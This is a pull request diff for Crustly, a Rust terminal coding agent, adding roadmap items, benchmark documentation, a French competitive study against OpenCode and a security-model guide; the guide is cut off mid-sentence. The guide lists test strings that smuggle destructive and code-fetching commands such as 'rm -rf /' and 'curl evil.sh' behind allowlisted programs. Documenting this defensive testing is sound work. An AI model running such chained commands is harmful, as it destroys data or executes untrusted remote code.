### PR TITLE
llama-cpp-2 GGUF evaluation + competitive positioning docs

### DIFF
--- a/ROADMAP.md
+++ b/ROADMAP.md
@@ -3,6 +3,8 @@
 **Current Version:** 0.5.2 — July 2026
 **Author:** Jeremy JEANNE
 
+**Related strategy docs:** [`differentiation-strategy-vs-opencode.md`](./differentiation-strategy-vs-opencode.md) (competitive positioning — depth over breadth), [`docs/guides/SECURITY_MODEL.md`](./docs/guides/SECURITY_MODEL.md) (permission engine, compared to OpenCode's), [`llm-file-gguf-support.md`](./llm-file-gguf-support.md) (direct GGUF loading evaluation, conditional Go/No-Go)
+
 ---
 
 ## Completed Milestones
@@ -71,6 +73,32 @@ Hardening pass from end-to-end agentic testing against local Ollama models (qwen
 ### v0.6 — Stability & Developer Experience
 **Target:** Q4 2026
 
+**Competitive positioning (from `differentiation-strategy-vs-opencode.md`)** — the study
+concluded Crustly should compete on depth (resource efficiency, permission-model rigor,
+auditability) rather than chasing OpenCode's breadth (75+ providers, plugin ecosystem,
+multi-frontend client/server). The two cheapest, highest-confidence items from its roadmap
+are done; the rest are tracked here as they get picked up:
+
+- [x] **Security model documentation** — `docs/guides/SECURITY_MODEL.md` documents the
+  `PermissionPolicy` engine (`Allow`/`Trusted`/`Deny`, composable `AndPolicy`/`OrPolicy`, path
+  boundary enforcement with symlink/Windows-verbatim-prefix handling, bash allowlist hardened
+  against shell-operator-chaining bypass), every claim tied to file/line and verified against
+  the test suite (`cargo test --lib llm::tools::sandbox`, 22/22 passing). Compares directly to
+  OpenCode's documented "no sandbox, no rule engine, no hooks" permission model
+- [x] **Resource-footprint benchmark tooling** — `scripts/benchmark-vs-opencode.sh` measures
+  cold-start time, peak RSS, and binary size reproducibly against OpenCode on the same machine
+  (`benchmarks/README.md` for methodology and ground rules: real numbers only, publish
+  unfavorable results too)
+- [ ] **Publish first real crustly-vs-opencode benchmark report** — run the script above on a
+  machine with both tools installed and commit the resulting report under `benchmarks/results/`
+  (not yet done from this environment — OpenCode isn't installed here, so no comparative numbers
+  have been fabricated)
+- [ ] **Plan Mode audit export** — `crustly plan export --session <id>`, turning the existing
+  persisted `PlanDocument`/`plan_tasks` model (ADR 0004) into a reviewable audit report; see
+  `differentiation-strategy-vs-opencode.md` §3.4
+- [ ] **"Zero-daemon" positioning in user-facing docs** — README/onboarding language stating
+  plainly that Crustly never starts a background server or opens a local port, unlike
+  OpenCode's Hono HTTP/SSE server (see `differentiation-strategy-vs-opencode.md` §3.2)
 - [ ] **Integration test suite** — full chat/tool/approval flows with a mock provider (no live API calls required)
 - [ ] **CI/CD pipeline** — GitHub Actions: `cargo test`, `cargo clippy`, `cargo fmt --check`, `cargo audit` on every PR
 - [ ] **Interactive settings TUI** — configure provider, API keys (masked), model, tool toggles, approval timeout from inside the TUI
@@ -123,6 +151,7 @@ Hardening pass from end-to-end agentic testing against local Ollama models (qwen
 | Item | Notes |
 |------|-------|
 | RAG / vector store | Semantic search over the codebase; integrate with the existing codebase index. Raw embedding generation is already available via the native Ollama provider (`crustly ollama embed`) — no retrieval layer wired up yet |
+| Direct GGUF model loading (no Ollama) | Evaluated in [`llm-file-gguf-support.md`](./llm-file-gguf-support.md) via the `llama-cpp-2` crate — technically sound (native crate, MIT/Apache-2.0, GGUF-native) but a multi-week embedded-inference-engine effort. **Conditional Go/No-Go**: currently No-Go pending confirmation of either an air-gapped/IT-restricted deployment requirement or a measured local-model tool-calling failure rate; reopen the moment either appears. Would complete Crustly's "zero-daemon" story end-to-end (see `differentiation-strategy-vs-opencode.md` §3.2) |
 | Multi-pane TUI | Chat + file preview split; tabs for multiple conversations |
 | Web interface | Optional `crustly serve` command exposing a browser UI |
 | Multi-user / team | Shared sessions, role-based approval, audit log export |
@@ -139,3 +168,7 @@ Hardening pass from end-to-end agentic testing against local Ollama models (qwen
 3. **Explicit approval** — dangerous operations always pause for user confirmation; no silent side effects.
 4. **Measurable before optimised** — add benchmarks before claiming performance improvements.
 5. **Security before features** — path traversal, injection, and API key hygiene are non-negotiable pre-conditions for 1.0.
+6. **Depth over breadth** — compete on resource efficiency, permission-model rigor, and
+   auditability rather than chasing provider count, plugin ecosystems, or multi-frontend
+   surface area; see `differentiation-strategy-vs-opencode.md` for the reasoning and the
+   explicit list of what this project deliberately does not chase.

--- a/benchmarks/README.md
+++ b/benchmarks/README.md
@@ -1,0 +1,33 @@
+# Benchmarks
+
+Reproducible performance comparisons between Crustly and other terminal AI
+coding tools. See `differentiation-strategy-vs-opencode.md` (repo root) §5-6
+for why these benchmarks exist and the ground rules for publishing them
+(raw numbers only, unfavorable results included, re-run periodically).
+
+## crustly vs OpenCode
+
+```bash
+scripts/benchmark-vs-opencode.sh --help
+```
+
+Measures cold-start time, peak resident memory (RSS), and binary size for
+both tools on the same machine, and writes a Markdown report to
+`benchmarks/results/`.
+
+- Builds `target/release/crustly` automatically if no crustly binary is
+  given and none exists yet.
+- If `opencode` isn't installed or passed via `--opencode-bin`, the report
+  marks its columns "not measured" instead of guessing — install it from
+  <https://opencode.ai> for a real comparison.
+- Uses [`hyperfine`](https://github.com/sharkdp/hyperfine) for cold-start
+  timing if available (recommended: `cargo install hyperfine` or your
+  package manager), otherwise falls back to a manual timing loop.
+- RSS is measured via GNU `/usr/bin/time -v` when available, or by polling
+  `/proc/<pid>/status` on Linux otherwise. Not currently supported on
+  macOS (BSD `time` has no `-v` equivalent) — the report says so rather
+  than printing a wrong number.
+
+`benchmarks/results/` is where reports land (`<timestamp>-<hostname>.md`).
+Commit a report only once it reflects a real run on real hardware with
+both tools actually installed — no placeholder/fabricated numbers.

--- a/differentiation-strategy-vs-opencode.md
+++ b/differentiation-strategy-vs-opencode.md
@@ -1,0 +1,389 @@
+# Stratégie de différenciation : Crustly face à OpenCode
+
+Statut : **Étude stratégique — propositions à valider avant tout engagement**
+Date : 2026-07-21
+Portée : identifier des axes de différenciation crédibles et défendables pour
+Crustly face à OpenCode (`opencode.ai`), l'agent de code IA open source
+dominant du marché en 2026, et proposer une feuille de route priorisée.
+
+---
+
+## 0. Résumé exécutif
+
+OpenCode a une échelle qu'aucune stratégie de rattrapage fonctionnel ne peut
+combler : ~160 000 ★ GitHub, ~7,5 millions de développeurs actifs mensuels,
+75+ providers, écosystème de plugins TypeScript, architecture client/serveur
+multi-frontend (TUI, desktop, web, mobile), licence MIT. **Chercher à
+égaler cette largeur fonctionnelle serait une stratégie perdante** pour une
+équipe de la taille de celle de Crustly.
+
+Cette étude identifie à la place **quatre axes de profondeur** où Crustly a
+déjà un avantage structurel réel, vérifiable dans son propre code, et que
+l'architecture d'OpenCode ne peut pas reproduire sans une refonte majeure :
+
+1. **Efficacité ressources mesurable** — Rust natif, process unique, contre
+   une stack TypeScript/Bun avec un serveur HTTP/SSE (Hono) qui tourne même
+   pour un usage TUI purement local.
+2. **Architecture véritablement monolithique, zéro démon** — pas de scission
+   client/serveur interne, ce qui ouvre des cas d'usage (air-gapped, postes
+   IT-restreints) qu'OpenCode ne sert pas nativement.
+3. **Modèle de sécurité plus profond** — moteur de policies composables
+   (`AndPolicy`, allowlist bash résistante au chaînage d'opérateurs shell,
+   frontières de chemin) contre l'aveu explicite d'OpenCode : *"no sandbox,
+   no rule engine, no hooks — just a channel and a human."*
+4. **Plan Mode auditable et persisté** — approbation explicite avant
+   exécution, tracée en base SQLite (`plan_tasks`, `compaction_records`),
+   contre l'approbation "une fois par session, on ne redemande plus"
+   d'OpenCode, plus permissive mais moins traçable.
+
+**Recommandation** : positionner Crustly non pas comme "un autre agent de
+code terminal", mais comme **l'agent de code pour les environnements
+contraints en ressources, en réseau, ou en gouvernance** — développeurs sur
+machines modestes, environnements air-gapped/réglementés, équipes qui ont
+besoin d'un journal d'audit de ce que l'IA a fait. C'est un marché de niche
+mais défendable, aligné avec ce que Crustly est déjà, plutôt qu'une course
+à la parité fonctionnelle avec un projet 1000x plus large en communauté.
+
+---
+
+## 1. Profil concurrentiel : OpenCode
+
+### 1.1 Échelle et modèle
+
+- **~160 000 ★** sur GitHub début 2026, **~7,5 millions de développeurs**
+  actifs mensuels revendiqués — l'agent de code terminal open source le
+  plus populaire par une large marge.
+- **Licence MIT**, gratuit, model-agnostic (l'utilisateur paie uniquement
+  les tokens du provider choisi).
+- **75+ providers** supportés (Anthropic, OpenAI, Gemini, Bedrock, Ollama,
+  et bien d'autres).
+- Positionnement confidentialité : pas de stockage du code/contexte côté
+  infrastructure OpenCode, les prompts partent directement vers le
+  provider configuré par l'utilisateur.
+
+### 1.2 Architecture
+
+Client/serveur : un serveur HTTP/WebSocket basé sur **Hono** orchestre
+trois modules (Agent Engine, Session Manager, Tool Registry), consommé par
+plusieurs frontends qui partagent le même backend :
+
+- **TUI** — construit sur OpenTUI + SolidJS.
+- **Desktop app** — Electron.
+- **Web / mobile** — clients distants sur le même serveur.
+- **SDK** — clients JavaScript et Python.
+
+Ce choix permet le **partage de session par lien** entre coéquipiers — une
+fonctionnalité forte, mais qui implique qu'un serveur HTTP tourne même pour
+un usage 100% local et solo dans un terminal.
+
+### 1.3 Fonctionnalités notables
+
+- **LSP Client** intégré (diagnostics, hover, go-to-definition) via le
+  Language Server Protocol.
+- **Système de plugins** TypeScript/JavaScript avec 25+ hooks de cycle de
+  vie.
+- **Sub-agents** : agents définis en code ou chargés depuis Markdown,
+  fusionnés dans un registre partagé, exécutés via un pipeline unifié de
+  prompt/permission/session.
+- **MCP Server** : support du Model Context Protocol pour connecter des
+  serveurs d'outils externes.
+- **AGENTS.md** : fichier d'instructions portable, avec repli sur
+  `CLAUDE.md` si présent — facilite la migration depuis Claude Code.
+
+### 1.4 Modèle de permissions et de sécurité — le point le plus important pour cette étude
+
+Confirmé par une analyse d'architecture indépendante (comparaison
+Claude Code / Codex / Cline / OpenCode) :
+
+> *"OpenCode uses Go channels to create a clean blocking-approval
+> pattern... OpenCode has no sandbox, no rule engine, no hooks — just a
+> channel and a human."*
+
+Le mécanisme est volontairement minimal : l'agent demande une permission,
+bloque jusqu'à réponse de l'utilisateur, et **mémorise l'approbation au
+niveau de la session** — une fois autorisée, une action similaire ne
+redemande plus. OpenCode parse les commandes shell avec `tree-sitter` (le
+même moteur que Neovim) pour repérer les commandes à risque (`rm`, `mv`,
+`chmod`, chemins hors projet) plus finement qu'un simple filtrage de
+chaînes, mais **il n'y a ni moteur de règles composables, ni hooks
+pré/post-exécution, ni sandbox OS**. C'est un choix de philosophie assumé
+— *"qui détient les clés"*, et OpenCode les donne entièrement à
+l'utilisateur, en misant sur l'inspectabilité plutôt que sur des couches de
+sécurité intégrées.
+
+C'est un écart concret, vérifiable, et directement opposable au modèle de
+Crustly (§3.3).
+
+---
+
+## 2. Ce que Crustly ne doit pas chasser (anti-objectifs)
+
+Avant de lister les axes à investir, il faut nommer explicitement ce qu'il ne
+faut **pas** essayer de répliquer, car le rapport effort/impact y est
+structurellement défavorable face à une communauté 1000x plus large :
+
+| Ce qu'OpenCode a | Pourquoi ne pas courir après |
+|---|---|
+| 75+ providers | Crustly en couvre déjà les plus utilisés (Anthropic, OpenAI, Gemini, Bedrock, Ollama, Qwen, Azure) ; chaque provider supplémentaire est un coût de maintenance récurrent pour un bénéfice marginal decroissant |
+| Multi-frontend (web/mobile/desktop) | Implique la même scission client/serveur que Crustly évite précisément dans son positionnement (§3.2) — les deux ne sont pas cumulables sans renoncer à l'avantage "process unique" |
+| Écosystème de plugins tiers (25+ hooks) | Nécessite une communauté de contributeurs de plugins pour avoir de la valeur ; sans l'échelle d'OpenCode, un système de plugins Crustly resterait vide |
+| Partage de session par lien | Suppose une infrastructure serveur/backend hébergé, contraire à l'architecture monolithique/offline-first visée (§3.2) |
+| Nombre absolu d'étoiles/d'utilisateurs | Effet de réseau déjà consolidé ; non rattrapable par des choix techniques, seulement par un positionnement différent qui capte un segment qu'OpenCode ne sert pas bien |
+
+Le risque principal d'ignorer cette liste : diluer l'effort d'ingénierie
+sur des fonctionnalités où Crustly ne pourra jamais atteindre la qualité
+ou l'adoption d'OpenCode, au détriment des axes où un avantage structurel
+existe déjà.
+
+---
+
+## 3. Les quatre axes de différenciation
+
+### 3.1 Efficacité ressources — mesurable, pas seulement revendiquée
+
+**État actuel** : Crustly est écrit en Rust, compilé en binaire natif
+(`cargo build --release` avec LTO fat, `codegen-units = 1`, `strip = true`,
+`panic = "abort"` — `Cargo.toml` lignes 151-156), sans runtime interprété ni
+machine virtuelle. OpenCode tourne sur Bun/Node avec un serveur HTTP/SSE
+actif en permanence (Hono), même pour une session TUI locale solo.
+
+**Ce qui manque aujourd'hui** : Crustly revendique déjà "performance,
+memory efficiency, and reduced resource consumption" dans `CLAUDE.md`, mais
+**aucun chiffre public ne le prouve** face à un concurrent nommé. C'est une
+affirmation non vérifiée, donc peu convaincante pour un utilisateur qui
+hésite entre les deux outils.
+
+**Initiative proposée** : un **benchmark reproductible et publié** (détail
+méthodologique en §5) comparant, sur la même machine, la même tâche :
+temps de démarrage à froid, RSS mémoire au repos et pendant une session
+active, taille du binaire/installation. Publier les résultats et le script
+de mesure (pas juste les chiffres) pour que la comparaison soit vérifiable
+par un tiers — la crédibilité vient de la reproductibilité, pas de
+l'affirmation.
+
+**Effort** : faible-moyen (quelques jours : script de mesure + exécution +
+rédaction). **Impact** : élevé si les chiffres sont favorables (matérialise
+une affirmation déjà faite mais jamais prouvée) ; risque de réputation si
+les chiffres sont défavorables (voir §6).
+
+### 3.2 Architecture monolithique, zéro démon
+
+**État actuel** : Crustly n'a pas de scission client/serveur interne — la
+TUI, l'orchestration LLM, la base SQLite et l'exécution des tools tournent
+dans le même process. OpenCode, même en usage 100% local et solo,
+maintient un serveur HTTP/WebSocket actif en arrière-plan.
+
+**Ce que cela ouvre pour Crustly** : des cas d'usage qu'OpenCode ne sert
+pas nativement — environnements air-gapped, postes contraints par une
+politique IT qui bloque les daemons/ports d'écoute locaux, pipelines
+CI/CD éphémères où démarrer et attendre un serveur compagnon ajoute de la
+complexité d'orchestration. C'est directement lié à l'évaluation déjà faite
+dans `llm-file-gguf-support.md` (chargement direct de modèles `.gguf` sans
+dépendre d'un serveur Ollama externe) : les deux initiatives se renforcent
+mutuellement — si l'inférence locale devient elle aussi monolithique (pas
+de daemon Ollama), Crustly devient l'un des seuls agents de code du segment
+à être **intégralement** zéro-démon, LLM local compris.
+
+**Initiative proposée** : formaliser ce positionnement dans la
+documentation ("Crustly ne démarre jamais de serveur, jamais de port
+d'écoute local — tout tourne dans un seul process") et le relier
+explicitement à l'évaluation GGUF déjà réalisée comme prochaine étape
+naturelle pour fermer complètement cette boucle. Voir `llm-file-gguf-
+support.md` §6 pour le cadre de décision Go/No-Go correspondant.
+
+**Effort** : faible pour la partie documentation/positionnement (déjà
+vrai aujourd'hui) ; élevé si le chargement GGUF direct est effectivement
+implémenté (déjà chiffré à plusieurs semaines dans le document lié).
+**Impact** : moyen à court terme (documentation), potentiellement élevé à
+moyen terme si combiné au GGUF direct — un vrai argument de niche
+défendable.
+
+### 3.3 Modèle de sécurité — l'écart le plus net et le plus prouvable
+
+**État actuel, vérifié dans le code** :
+
+- `src/llm/tools/sandbox.rs` définit un trait `PermissionPolicy` composable
+  (`evaluate(tool_name, inputs) -> PolicyDecision`), avec trois issues
+  distinctes — `Allow` (permis mais toujours soumis au prompt d'approbation
+  normal), `Trusted` (allowlisté explicitement, aucun prompt), `Deny`
+  (bloqué, avec message) — une distinction intentionnelle documentée en
+  commentaire (lignes 12-19) pour éviter qu'une politique par défaut
+  "permissive" ne supprime silencieusement toute demande d'approbation.
+- Une **allowlist bash** (`security.allow_bash` dans `config.toml`,
+  `src/config/mod.rs` ligne 56) est testée contre le contournement par
+  **chaînage d'opérateurs shell** — le test
+  `bash_allowlist_never_trusts_shell_operator_chaining`
+  (`sandbox.rs` ligne 705) vérifie explicitement qu'une commande
+  allowlistée ne devient pas une porte dérobée si on la chaîne avec `&&`,
+  `;`, `|` pour exécuter autre chose derrière.
+- Trois modes d'approbation documentés dans `CLAUDE.md` (Interactive par
+  défaut, AutoPlan pour les actions à faible risque, FullAuto), construits
+  sur ce même moteur de policies composables (`AndPolicy` pour chaîner
+  plusieurs règles).
+- Enforcement des frontières de chemin (symlinks et échappements `../../`
+  bloqués), vérifié avant toute opération fichier.
+
+**Comparaison directe avec OpenCode** : la citation de §1.4 — *"no sandbox,
+no rule engine, no hooks — just a channel and a human"* — décrit
+précisément ce que Crustly **a** et qu'OpenCode **n'a pas** : un moteur de
+règles composables, une distinction formelle entre "permis avec prompt" et
+"allowlisté sans prompt", et des tests dédiés à des classes de
+contournement connues (chaînage d'opérateurs). Ce n'est pas une
+affirmation marketing à construire — c'est déjà implémenté et testé
+aujourd'hui dans ce dépôt.
+
+**Initiative proposée** : documenter cet écart explicitement (page
+"Sécurité" comparative dans le README ou un guide dédié), en citant le
+comportement réel d'OpenCode (sourcé, pas une attaque non fondée) face au
+moteur de policies de Crustly. C'est l'axe où Crustly a le **moins** de
+travail à faire pour matérialiser un avantage réel — il s'agit surtout de
+le rendre visible.
+
+**Effort** : très faible (documentation d'un état déjà existant).
+**Impact** : élevé pour le segment "équipes/entreprises soucieuses de
+sécurité", qui est probablement le public le plus réceptif à un
+positionnement de niche face à un OpenCode généraliste.
+
+### 3.4 Plan Mode auditable et persisté
+
+**État actuel** : `src/plan/mod.rs` définit un `PlanDocument` complet
+(tâches, contexte, risques identifiés, stratégie de test, stack technique,
+statut) qui vit délibérément à la racine du crate plutôt que sous `tui/`
+pour rester indépendant de l'UI (ADR 0004, `docs/architecture/decisions/
+0004-plan-mode-read-only-with-approval-gating.md`) — un choix
+architectural qui garantit que la planification passe par une porte
+d'approbation explicite avant exécution, tracée en base SQLite
+(`plan_tasks`, `compaction_records` pour l'historique de compaction du
+contexte).
+
+**Comparaison avec OpenCode** : les sub-agents d'OpenCode sont orientés
+délégation de tâches entre agents, avec une approbation "une fois par
+session" qui ne redemande plus ensuite (§1.4) — un modèle optimisé pour la
+fluidité, pas pour la traçabilité. Crustly, à l'inverse, peut répondre à la
+question *"qu'est-ce que l'IA a fait exactement, et qui l'a approuvé ?"*
+avec un enregistrement persisté, pas seulement un log de session éphémère.
+
+**Initiative proposée** : formaliser un **export d'audit** du Plan Mode
+(ex. `crustly plan export --session <id>` produisant un rapport lisible :
+tâches proposées, statut d'approbation, actions exécutées, horodatage) —
+transforme un avantage architectural déjà présent en fonctionnalité
+utilisateur concrète et démontrable, utile en particulier pour des équipes
+sous obligation de conformité (revue de code assistée par IA avec preuve
+d'approbation humaine).
+
+**Effort** : moyen (le modèle de données existe déjà ; il s'agit
+principalement d'une commande d'export et d'un format de rapport).
+**Impact** : moyen-élevé pour le segment entreprise/réglementé, différenciant
+car structurellement absent du modèle de session d'OpenCode.
+
+---
+
+## 4. Feuille de route priorisée
+
+| # | Initiative | Axe | Effort | Impact | Dépendances |
+|---|---|---|---|---|---|
+| 1 | Documenter l'écart de modèle de sécurité (§3.3) | Sécurité | Très faible | Élevé | Aucune — état déjà existant |
+| 2 | Script de benchmark reproductible (démarrage, RSS, taille binaire) vs OpenCode | Ressources | Faible-moyen | Élevé (si favorable) | Aucune |
+| 3 | Formaliser le positionnement "zéro démon" dans la doc | Architecture | Faible | Moyen | Aucune |
+| 4 | Export d'audit Plan Mode (`crustly plan export`) | Auditabilité | Moyen | Moyen-élevé | `src/plan/mod.rs` existant |
+| 5 | Décision Go/No-Go sur le chargement GGUF direct | Architecture | Élevé (plusieurs semaines si GO) | Élevé à moyen terme | Voir `llm-file-gguf-support.md` §6 |
+
+**Ordre recommandé** : 1 → 2 → 3 avant 4 et 5. Les trois premières
+initiatives ne nécessitent aucun développement de fonctionnalité — seulement
+de la mesure et de la documentation d'un état déjà réel — et peuvent être
+livrées en quelques jours à quelques semaines cumulées, avec un rapport
+effort/impact nettement meilleur que les initiatives 4 et 5, qui restent
+pertinentes mais plus coûteuses.
+
+---
+
+## 5. Plan de benchmark (initiative #2, détail méthodologique)
+
+Objectif : produire une comparaison **reproductible par un tiers**, pas une
+affirmation. Métriques et méthode :
+
+1. **Temps de démarrage à froid** : `hyperfine` (déjà l'outil standard pour
+   ce type de mesure) sur `crustly --version`/`--help` vs l'équivalent
+   OpenCode, plusieurs runs, même machine, même charge système.
+2. **Empreinte mémoire au repos** : RSS mesuré via `/usr/bin/time -v` (Linux)
+   ou équivalent, juste après démarrage, avant toute interaction — pour
+   Crustly (process unique) vs OpenCode (process serveur + process client,
+   les deux comptabilisés puisque c'est le coût réel pour l'utilisateur).
+3. **Empreinte mémoire en session active** : même mesure après une tâche de
+   complexité comparable (ex. lecture + édition d'un fichier, un appel
+   d'outil), pour capturer l'usage réaliste et pas seulement l'idle.
+4. **Taille de l'installation** : taille du binaire Crustly (`cargo build
+   --release`, éventuellement `--profile release-small`) vs la taille totale
+   de l'installation OpenCode (runtime Bun/Node inclus si nécessaire pour
+   fonctionner).
+5. **Publication** : script de mesure versionné dans le dépôt (reproductible
+   par quiconque, sur sa propre machine), résultats bruts + méthodologie
+   documentée, pas seulement un tableau de chiffres sans contexte — la
+   crédibilité de ce benchmark dépend entièrement de sa vérifiabilité.
+
+**Risque à anticiper** (voir aussi §6) : si le résultat n'est pas
+favorable sur une métrique donnée (ex. si OpenCode a par ailleurs optimisé
+son propre démarrage), publier quand même les chiffres bruts avec la
+méthodologie plutôt que de ne publier que les métriques favorables — un
+benchmark sélectif perd toute crédibilité dès qu'il est vérifié par un
+tiers, ce qui est probable vu la popularité d'OpenCode.
+
+---
+
+## 6. Risques et limites honnêtes de cette stratégie
+
+- **Effet de réseau non rattrapable par la technique seule** : même avec un
+  avantage réel sur les quatre axes ci-dessus, l'écosystème (plugins,
+  intégrations, effet de communauté) d'OpenCode continuera de peser lourd
+  dans le choix de nombreux utilisateurs, indépendamment du mérite
+  technique. Cette stratégie vise un segment plus restreint et spécifique,
+  pas un basculement massif d'utilisateurs OpenCode vers Crustly.
+- **OpenCode peut réagir** : rien n'empêche OpenCode d'ajouter un mode
+  sandbox plus strict ou un mode "process unique" à l'avenir — ces axes de
+  différenciation sont des avantages actuels, pas des garanties
+  permanentes. Le benchmark (§5) devrait être revu périodiquement, pas
+  publié une fois pour toutes.
+- **Capacité de l'équipe** : les initiatives 4 et 5 de la feuille de route
+  (§4) demandent un effort d'ingénierie réel (semaines) ; à ne lancer que
+  si le budget correspondant est confirmé disponible sans repousser une
+  autre priorité (même logique de prérequis que dans `llm-file-gguf-
+  support.md` §6).
+- **Le benchmark peut se retourner** : si Crustly perd sur une métrique
+  mesurée (ex. temps de démarrage à froid dominé par un facteur imprévu),
+  le publier quand même reste la bonne décision (transparence >
+  sélectivité), mais cela doit être anticipé avant de s'engager
+  publiquement sur ce terrain.
+
+---
+
+## 7. Suite à donner
+
+1. Valider ou amender la liste d'axes (§3) et d'anti-objectifs (§2) avec
+   les priorités produit réelles — cette étude propose une lecture du code
+   existant, pas une décision finale.
+2. Lancer les initiatives 1-3 de la feuille de route (§4), qui ne
+   nécessitent aucun développement de fonctionnalité nouvelle.
+3. Pour les initiatives 4-5, traiter chacune comme un projet séparé avec
+   son propre cadrage (sur le modèle de `llm-file-gguf-support.md` pour la
+   #5, qui existe déjà).
+
+---
+
+## Sources consultées
+
+- Recherche web sur `opencode.ai` — échelle, architecture (Hono/OpenTUI/
+  SolidJS/Electron), fonctionnalités (LSP, plugins, sub-agents, MCP,
+  partage de session), licence
+- Analyse comparative indépendante des modèles de permission (Claude Code
+  vs Codex vs Cline vs OpenCode) — citation sur l'absence de
+  sandbox/moteur de règles/hooks côté OpenCode
+- `src/llm/tools/sandbox.rs`, `src/llm/tools/cache.rs`, `src/plan/mod.rs`,
+  `src/config/mod.rs`, `Cargo.toml` (ce dépôt) — vérification directe des
+  mécanismes de sécurité, du modèle Plan, et des réglages de build
+- `docs/architecture/decisions/0004-plan-mode-read-only-with-approval-
+  gating.md` — rationale du Plan Mode
+- `docs/architecture/PERFORMANCE_PLAN.md` (ce dépôt) — travaux de
+  performance déjà engagés, notamment sur l'inférence locale
+- `llm-file-gguf-support.md` (ce dépôt) — évaluation liée sur le chargement
+  GGUF direct, référencée comme initiative complémentaire à l'axe
+  "architecture monolithique"

--- a/docs/guides/SECURITY_MODEL.md
+++ b/docs/guides/SECURITY_MODEL.md
@@ -1,0 +1,208 @@
+# 🔒 Crustly's Security & Permission Model
+
+This document explains how Crustly decides whether a tool call (file write,
+shell command, etc.) runs automatically, prompts for approval, or is
+blocked outright — and how that compares to other terminal AI coding
+agents. See `differentiation-strategy-vs-opencode.md` (repo root) for the
+competitive context this document supports.
+
+Every claim below is backed by code in this repository, referenced by file
+and line so you can verify it yourself rather than take the doc's word for
+it.
+
+---
+
+## The core idea: a composable policy engine, not a single on/off switch
+
+Every tool call goes through a `PermissionPolicy` before it executes:
+
+```rust
+// src/llm/tools/sandbox.rs
+pub trait PermissionPolicy: Send + Sync {
+    fn evaluate(&self, tool_name: &str, inputs: &Value) -> PolicyDecision;
+}
+```
+
+`ToolRegistry::execute` evaluates this policy tree **before every tool
+call** — there's no code path that skips it. A policy returns one of three
+outcomes, and the distinction between the first two is deliberate, not
+incidental (`sandbox.rs` lines 12-19):
+
+| `PolicyDecision` | Meaning |
+|---|---|
+| `Trusted` | Explicitly vouched for — runs **without** an approval prompt. |
+| `Allow` | Permitted, but still **prompts** the user for approval. |
+| `Deny(reason)` | Blocked outright, with a reason shown to the user. |
+
+> A rule that merely has *no objection* returns `Allow` — it still prompts.
+> Only a rule that **affirmatively vouches** for these specific inputs may
+> return `Trusted`. This is why the default policy (`AllowAll`, when
+> nothing is configured) can't silently bypass approval: "no opinion" and
+> "trusted" are different types, not different values of the same flag.
+
+Individual rules compose via `AndPolicy` (every rule must permit) and
+`OrPolicy` (first rule to make a call wins) — `SecurityConfig::to_policy()`
+(`src/config/mod.rs` lines 65-85) builds exactly this kind of chain from
+your `config.toml`, rather than hard-coding a single security check.
+
+---
+
+## The built-in rules
+
+### Path boundary enforcement
+
+`PathBoundaryRule` / `check_path` (`sandbox.rs`, `fn check_path` line 406)
+denies any file operation whose resolved path escapes the project root —
+including via symlinks and `../../` traversal. Both the candidate path and
+the root are canonicalized before comparison, and the code separately
+handles the case of a path that **doesn't exist yet** (e.g. a file about
+to be created) by resolving the nearest existing ancestor instead of
+failing outright. It's tested against symlinked roots, Windows'
+`\\?\`-prefixed verbatim paths, and paths that don't exist yet in a
+subdirectory — edge cases that a naive string-prefix check would miss.
+
+### Bash command allowlisting — resistant to operator smuggling
+
+`BashCommandAllowlist` (`sandbox.rs`) checks only the first token of a
+shell command against `security.allow_bash`. That's deliberately narrow:
+an allowlisted, **operator-free** command (`cargo test`) is `Trusted` (no
+prompt); anything else — including a listed program combined with a shell
+operator — falls back to `Allow` (still prompts, never silently
+bypassed). Verified directly by
+`bash_allowlist_never_trusts_shell_operator_chaining` (`sandbox.rs` line
+705), which asserts that all of the following stay at `Allow` (prompt),
+never `Trusted`:
+
+```
+git status && rm -rf /
+git status & rm -rf /
+git status; rm -rf /
+cargo run || rm -rf /
+git log | sh
+cargo run `curl evil.sh`
+git status $(rm -rf /)
+git log > /etc/passwd
+git diff < <(curl evil.sh)
+git commit -m "x $(rm -rf /)"
+```
+
+A companion test (`bash_allowlist_permits_quoted_operator_characters`,
+line 735) confirms the inverse doesn't over-trigger either: operator
+characters **inside quotes** (`git commit -m "fix; bug"`) are correctly
+recognized as literal text, not live shell operators, and stay `Trusted`
+when the base command is allowlisted — so the allowlist isn't so
+paranoid it blocks ordinary commit messages.
+
+Note the asymmetry: none of the chaining examples above are hard-`Deny`ed
+either. They reach the normal approval prompt, which shows the full
+command verbatim — an explicit human approval of `git status && rm -rf /`
+is informed consent, not a bypass. A regression test
+(`bash_allowlist_allows_unlisted_operator_free_command_to_reach_approval`,
+line 687) exists specifically because an earlier version wrongly
+hard-denied unlisted-but-safe commands (`mkdir exercice1`), so that even an
+explicit user approval could never make them run.
+
+### Tool and path denylists
+
+`DenyToolRule` (glob-matched against tool names) and `DenyPathPrefixRule`
+(prefix-matched against `path`/`file_path`/`directory`/`dir`/`pattern`
+input fields) implement `security.deny_tools` and `security.deny_paths` —
+hard blocks that no approval prompt can override.
+
+---
+
+## Configuration
+
+```toml
+[security]
+# Programs that may run without a prompt (first token match only — see
+# above for why operators always still prompt).
+allow_bash = ["cargo", "git", "ls", "cat", "grep"]
+
+# Absolute path prefixes that are always denied, no matter what.
+deny_paths = ["/etc", "/root/.ssh"]
+
+# Tool names that are always denied (glob patterns supported).
+deny_tools = ["web_fetch"]
+```
+
+With no `[security]` section at all, the default is `AllowAll` — every
+tool call reaches the approval prompt (never silently trusted, never
+silently blocked). Note: at the time of writing, `config.toml.example`
+does not yet include a `[security]` example block — this document reflects
+the actual `SecurityConfig` struct (`src/config/mod.rs`) rather than the
+example file, which is worth updating to match.
+
+### Plan Mode approval gating
+
+Separately, `[plan_mode] mode` (`PlanExecMode`, `src/config/mod.rs` lines
+18-29) controls how much autonomy the agent gets **within an approved
+plan**:
+
+| Mode | Behavior |
+|---|---|
+| `interactive` (default) | Ask for approval before every task. |
+| `auto_plan` | Approve the plan once, then run all its tasks automatically. |
+| `full_auto` | No approval gate at all. |
+
+This is a separate, composable layer from the `[security]` policy chain
+above — even in `full_auto` plan mode, `security.deny_tools`/`deny_paths`
+still apply, since they're hard denies evaluated at the tool-call level,
+not at the plan level.
+
+---
+
+## How this compares to other terminal AI agents
+
+An independent architecture comparison of Claude Code, Codex, Cline, and
+OpenCode describes OpenCode's permission model as:
+
+> *"OpenCode uses Go channels to create a clean blocking-approval
+> pattern... OpenCode has no sandbox, no rule engine, no hooks — just a
+> channel and a human."*
+
+OpenCode's model asks once per session and remembers the approval — simple
